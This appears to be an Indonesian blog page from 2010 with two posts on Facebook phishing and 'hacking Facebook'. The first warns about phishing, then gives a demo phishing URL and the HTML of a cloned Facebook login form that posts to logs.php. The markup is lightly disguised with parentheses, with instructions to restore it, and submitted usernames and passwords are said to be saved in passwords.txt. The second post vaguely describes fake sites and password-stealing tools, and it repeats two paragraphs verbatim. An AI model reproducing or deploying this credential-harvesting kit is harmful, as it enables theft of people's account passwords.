beberapa bulan terakhir, Facebook yang merupakan social network (jejaring sosial) terbesar sering mendapat phising baik itu dari email, IM seperti yahoo messenger, maupun dari pesan dari contact list facebook sendiri.
Serangan phising terbesar menurut facebook dilakukan oleh 2 website yaitu FBStarter.com dan BAction.net beberapa waktu lalu. Meraka biasa mengirim pesan berupa kata-kata “Check this out”. Kemudian mereka mengundang korban untuk meng-klik link yang akan membawa mereka keluar dari Facebook.
Pihak Facebook menyatakan bahwa serangan tersebut berhenti setiap beberapa jam pada tiap kasusnya. Facebook juga menyatakan bahwa belum ada kepastian apakah serangan dari kedua website tersebut saling terkait atau tidak.
Facebook telah menghapus URL tersebut dari member page dan membuang URL yang ada di pesan mail. Untuk user yang telah terjebak phising ini, pihak Facebook telah mereset password mereka. Facebook juga menganjurkan para usernya untuk tidak meng-click link yang mencurigakan serta menganjurkan para user yang telah menjadi korban untuk segera mengganti password.
Phising merupakan proses untuk mendapatkan informasi sensitif seperti username, password dan bahkan sampai detail kartu kredit dengan berpura-pura menjadi website asli.
Biasanya si pelaku memancing korbannya untuk masuk ke website yang dibuat mirip dengan website aslinya. Pada website palsu itu, si pelaku telah menaruh box username dan password dan meminta korban untuk login. Jadi di sini si pelaku melakukan penipuan login atau biasa di sebut fake login.
Bagaimana kita tahu kalau itu fake login ?
Untuk mengetahui itu web phising yang menggunakan fake login, kita harus teliti url untuk login di facebook itu sendiri. Untuk login, facebook menggunakan url https://login.facebook.com/login.php
Contoh Web phising dengan fake login
Coba anda akses http://facebook.ariefew.com dulu dan lakukan login dengan username dan password palsu !!
Tampilan utama menggunakan source code dari https://login.facebook.com/login.php yang disimpan menjadi index.html. Tapi di index.html ini kita tambahi di form dengan pemanggilan code php untuk penyimpanan username dan password yang diisikan.
..
isi skrip...
(b)(form method=”POST” action=”logs.php” name=”menubar_login”
id=”menubar_login”)(input type=”hidden” name=”charset_test”
value=”€,´,€,´,?,?,?” /)(input type=”hidden” id=”locale”
name=”locale” value=”en_US” /)(table cellpadding=”0″ cellspacing=”0″)(tr)(td
class=”login_form_label_field login_form_label_remember”)(label)(input
type=”checkbox” name=”persistent” value=”1″ /)Remember Me(/label)(/td)(td
class=”login_form_label_field”)(a href=”http://www.facebook.com/reset.php”
rel=”nofollow”)Forgot your password?(/a)(/td)(td class=”login_form_last_field
login_form_label_field”)(/td)(/tr)(tr)(td)(input type=”text” class=”inputtext”
id=”email” name=”email” value=”" /)(/td)(td)(input type=”password”
class=”inputpassword” id=”pass” name=”pass” value=”" /)(input type=”text”
class=”inputtext hidden_elem” id=”pass_placeholder” name=”pass_placeholder”
value=”" /)(/td)(td class=”login_form_last_field”)(div
class=”UILinkButton”)(input type=”submit” class=”UILinkButton_A” value=”Login”
/)(div class=”UILinkButton_RW”)(div
class=”UILinkButton_R”)(/div)(/div)(/div)(/td)(/tr)(/table)(input type=”hidden”
name=”charset_test” value=”€,´,€,´,?,?,?” /)(/form)(/b)
kemudian ganti tanda "(" dengan <, dan tanda ")" dengan >
Pengisisan di web phising yang menggunakan fake login facebook ini akan tersimpan di passwords.txt secara terus menerus……..
Bahaya kan……
Kamis, 14 Januari 2010
hacking , stuffing facebook
situs facebook telah menduduki posisi 5 TOP web dalam rangking alexa. Mengalahkah social networking lainnya. Karena kepopulerannya itu lah tak ayal orang ingin mencari dan mengetahui apapun artikel tentang facebook. hacking facebook pun jadi incaran banyak orang, entah apa yg menjadi tujuan mengapa orang ingin sekali untuk belajar, dan mengetahui apapun hal tentang cara hackinh facebook. Bagaimana cara hacking Facebook..??
Kita sadar, pengembang facebook memang sangat mempertimbangkan sekuritas dari website pertemanan ini. Hingga saat ini, hacking facebook dapat dikatakan ke arah hacking yang sesungguhnya. Artinya hacking not cracking, hacker not crakcer. Yupz hacking facebook identik dengan membuat tampilan dan aplikasi facebook ke arah yang lebih bagus. Beda dengan cracker yang identik dengan “merusak”. Namun dilema dalam masyarakat cyber pada umumnya, hacker adalah sang perusak. Hacker facebook = menjebol password facebook, mengubah data facebook orang lain dan stigma negatif lainnya.
Hacking facebook dengan mengubah layout facebook agar lebih bagus, seperti pada friendster, setiap user dapat memodifikasi tampilan friendster. Semakin menarik mungkin, banyak teman yang merequest untuk di-add. Cara hacking facebook dapat dilakukan dengan cara ikut membuat aplikasi facebook.
Hacking facebook dalam rana “negatif”, berusaha untuk mendapatkan username dan password facebook orang lain. Baik dengan cara membuat website tiruan facebook, fake sites. Mungkin ini salah satu cara diterapkan pada pendahulunya, friendster. Mengubah tampilan facebook palsu seakan-akan terlihat facebook asli dan user mamasukan username dan password facebook sehingga data tersebut akan dikirim ke database sang hacker facebook bukan ke website facebook yang asli.
Atau dengan cara memasang tool ampuh untuk mencari username dan password facebook di komputer-komputer pasti tahukan jenis hacking yang satu ini.
Kita sadar, pengembang facebook memang sangat mempertimbangkan sekuritas dari website pertemanan ini. Hingga saat ini, hacking facebook dapat dikatakan ke arah hacking yang sesungguhnya. Artinya hacking not cracking, hacker not crakcer. Yupz hacking facebook identik dengan membuat tampilan dan aplikasi facebook ke arah yang lebih bagus. Beda dengan cracker yang identik dengan “merusak”. Namun dilema dalam masyarakat cyber pada umumnya, hacker adalah sang perusak. Hacker facebook = menjebol password facebook, mengubah data facebook orang lain dan stigma negatif lainnya.
Hacking facebook dengan mengubah layout facebook agar lebih bagus, seperti pada friendster, setiap user dapat memodifikasi tampilan friendster. Semakin menarik mungkin, banyak teman yang merequest untuk di-add. Cara hacking facebook dapat dilakukan dengan cara ikut membuat aplikasi facebook.
Hacking facebook dalam rana “negatif”, berusaha untuk mendapatkan username dan password facebook orang lain. Baik dengan cara membuat website tiruan facebook, fake sites. Mungkin ini salah satu cara diterapkan pada pendahulunya, friendster. Mengubah tampilan facebook palsu seakan-akan terlihat facebook asli dan user mamasukan username dan password facebook sehingga data tersebut akan dikirim ke database sang hacker facebook bukan ke website facebook yang asli.
Atau dengan cara memasang tool ampuh untuk mencari username dan password facebook di komputer-komputer pasti tahukan jenis hacking yang satu ini.
Langganan:
Postingan (Atom)
